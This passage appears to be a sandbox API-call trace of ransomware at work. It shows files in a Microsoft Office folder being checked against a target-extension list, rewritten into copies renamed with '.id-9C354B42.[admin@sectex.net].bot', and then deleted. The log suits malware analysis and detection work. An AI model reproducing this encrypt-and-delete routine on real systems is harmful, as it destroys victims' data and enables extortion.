	[0161.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.325] lstrlenW (lpString=".dbf") returned 4
	[0161.325] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.325] lstrlenW (lpString=".1cd") returned 4
	[0161.325] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.325] lstrlenW (lpString=".jpg") returned 4
	[0161.325] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.326] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.326] lstrlenW (lpString="POSTITL.ICO") returned 11
	[0161.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postitl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0161.669] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1078) returned 1
	[0161.669] CloseHandle (hObject=0x398) returned 1
	[0161.669] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postitl.ico")) returned 0x20
	[0161.669] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postitl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postitl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0161.670] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.670] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postitl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.671] GetLastError () returned 0x0
	[0161.671] ReadFile (in: hFile=0x398, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x436, lpOverlapped=0x0) returned 1
	[0161.691] WriteFile (in: hFile=0x1d8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0161.692] ReadFile (in: hFile=0x398, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.692] WriteFile (in: hFile=0x1d8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0161.692] SetEndOfFile (hFile=0x1d8) returned 1
	[0161.692] CloseHandle (hObject=0x1d8) returned 1
	[0161.692] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.692] SetEndOfFile (hFile=0x398) returned 1
	[0161.694] CloseHandle (hObject=0x398) returned 1
	[0161.694] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.694] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postitl.ico")) returned 1
	[0161.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.695] lstrlenW (lpString=".doc") returned 4
	[0161.695] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.695] lstrlenW (lpString=".docx") returned 5
	[0161.695] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.695] lstrlenW (lpString=".pdf") returned 4
	[0161.695] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.695] lstrlenW (lpString=".xls") returned 4
	[0161.695] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.695] lstrlenW (lpString=".xlsx") returned 5
	[0161.695] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.695] lstrlenW (lpString=".ppt") returned 4
	[0161.695] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.695] lstrlenW (lpString=".zip") returned 4
	[0161.695] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.695] lstrlenW (lpString=".rar") returned 4
	[0161.696] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.696] lstrlenW (lpString=".bz2") returned 4
	[0161.696] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.696] lstrlenW (lpString=".7z") returned 3
	[0161.696] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.696] lstrlenW (lpString=".dbf") returned 4
	[0161.696] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.696] lstrlenW (lpString=".1cd") returned 4
	[0161.696] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.696] lstrlenW (lpString=".jpg") returned 4
	[0161.696] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.696] lstrlenW (lpString=".doc") returned 4
	[0161.696] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.696] lstrlenW (lpString=".docx") returned 5
	[0161.696] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.696] lstrlenW (lpString=".pdf") returned 4
	[0161.696] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.696] lstrlenW (lpString=".xls") returned 4
	[0161.696] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.696] lstrlenW (lpString=".xlsx") returned 5
	[0161.696] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.696] lstrlenW (lpString=".ppt") returned 4
	[0161.696] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.696] lstrlenW (lpString=".zip") returned 4
	[0161.696] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.696] lstrlenW (lpString=".rar") returned 4
	[0161.696] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.697] lstrlenW (lpString=".bz2") returned 4
	[0161.697] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.697] lstrlenW (lpString=".7z") returned 3
	[0161.697] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.697] lstrlenW (lpString=".dbf") returned 4
	[0161.697] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.697] lstrlenW (lpString=".1cd") returned 4
	[0161.697] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO") returned 65
	[0161.697] lstrlenW (lpString=".jpg") returned 4
	[0161.697] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.697] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.697] lstrlenW (lpString="POSTS.ICO") returned 9
	[0161.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\posts.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.652] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2998) returned 1
	[0162.652] CloseHandle (hObject=0x3f0) returned 1
	[0162.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\posts.ico")) returned 0x20
	[0162.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\posts.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\posts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.653] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.653] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\posts.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0162.654] GetLastError () returned 0x0
	[0162.654] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0162.656] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0162.657] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.657] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0162.658] SetEndOfFile (hFile=0x3c4) returned 1
	[0162.658] CloseHandle (hObject=0x3c4) returned 1
	[0162.658] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.658] SetEndOfFile (hFile=0x3f0) returned 1
	[0162.660] CloseHandle (hObject=0x3f0) returned 1
	[0162.660] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.660] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\posts.ico")) returned 1
	[0162.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.661] lstrlenW (lpString=".doc") returned 4
	[0162.661] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.661] lstrlenW (lpString=".docx") returned 5
	[0162.661] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0162.661] lstrlenW (lpString=".pdf") returned 4
	[0162.661] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.661] lstrlenW (lpString=".xls") returned 4
	[0162.661] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.661] lstrlenW (lpString=".xlsx") returned 5
	[0162.661] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0162.661] lstrlenW (lpString=".ppt") returned 4
	[0162.661] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.661] lstrlenW (lpString=".zip") returned 4
	[0162.661] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.661] lstrlenW (lpString=".rar") returned 4
	[0162.661] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.661] lstrlenW (lpString=".bz2") returned 4
	[0162.661] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.661] lstrlenW (lpString=".7z") returned 3
	[0162.661] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.661] lstrlenW (lpString=".dbf") returned 4
	[0162.661] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.662] lstrlenW (lpString=".1cd") returned 4
	[0162.662] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.662] lstrlenW (lpString=".jpg") returned 4
	[0162.662] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.662] lstrlenW (lpString=".doc") returned 4
	[0162.662] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.662] lstrlenW (lpString=".docx") returned 5
	[0162.662] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0162.662] lstrlenW (lpString=".pdf") returned 4
	[0162.662] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.662] lstrlenW (lpString=".xls") returned 4
	[0162.662] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.662] lstrlenW (lpString=".xlsx") returned 5
	[0162.662] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0162.662] lstrlenW (lpString=".ppt") returned 4
	[0162.662] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.662] lstrlenW (lpString=".zip") returned 4
	[0162.662] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.662] lstrlenW (lpString=".rar") returned 4
	[0162.662] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.662] lstrlenW (lpString=".bz2") returned 4
	[0162.662] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.662] lstrlenW (lpString=".7z") returned 3
	[0162.662] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.662] lstrlenW (lpString=".dbf") returned 4
	[0162.662] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.663] lstrlenW (lpString=".1cd") returned 4
	[0162.663] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO") returned 63
	[0162.663] lstrlenW (lpString=".jpg") returned 4
	[0162.663] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.663] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0162.663] lstrlenW (lpString="REMOTEL.ICO") returned 11
	[0162.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotel.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.663] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1078) returned 1
	[0162.663] CloseHandle (hObject=0x3f0) returned 1
	[0162.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotel.ico")) returned 0x20
	[0162.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotel.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotel.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.664] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.664] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotel.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0162.665] GetLastError () returned 0x0
	[0162.665] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x436, lpOverlapped=0x0) returned 1
	[0162.666] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0162.667] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.667] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0162.667] SetEndOfFile (hFile=0x3c4) returned 1
	[0162.668] CloseHandle (hObject=0x3c4) returned 1
	[0162.668] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.668] SetEndOfFile (hFile=0x3f0) returned 1
	[0162.673] CloseHandle (hObject=0x3f0) returned 1
	[0162.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.673] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotel.ico")) returned 1
	[0162.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.674] lstrlenW (lpString=".doc") returned 4
	[0162.674] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.674] lstrlenW (lpString=".docx") returned 5
	[0162.674] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0162.674] lstrlenW (lpString=".pdf") returned 4
	[0162.674] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.674] lstrlenW (lpString=".xls") returned 4
	[0162.674] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.674] lstrlenW (lpString=".xlsx") returned 5
	[0162.674] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0162.674] lstrlenW (lpString=".ppt") returned 4
	[0162.674] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.675] lstrlenW (lpString=".zip") returned 4
	[0162.675] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.675] lstrlenW (lpString=".rar") returned 4
	[0162.675] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.675] lstrlenW (lpString=".bz2") returned 4
	[0162.675] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.675] lstrlenW (lpString=".7z") returned 3
	[0162.675] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.675] lstrlenW (lpString=".dbf") returned 4
	[0162.675] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.675] lstrlenW (lpString=".1cd") returned 4
	[0162.675] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.675] lstrlenW (lpString=".jpg") returned 4
	[0162.675] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.675] lstrlenW (lpString=".doc") returned 4
	[0162.675] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.675] lstrlenW (lpString=".docx") returned 5
	[0162.675] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0162.675] lstrlenW (lpString=".pdf") returned 4
	[0162.675] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.675] lstrlenW (lpString=".xls") returned 4
	[0162.675] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.675] lstrlenW (lpString=".xlsx") returned 5
	[0162.675] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0162.675] lstrlenW (lpString=".ppt") returned 4
	[0162.675] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.676] lstrlenW (lpString=".zip") returned 4
	[0162.676] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.676] lstrlenW (lpString=".rar") returned 4
	[0162.676] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.676] lstrlenW (lpString=".bz2") returned 4
	[0162.676] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.676] lstrlenW (lpString=".7z") returned 3
	[0162.676] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.676] lstrlenW (lpString=".dbf") returned 4
	[0162.676] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
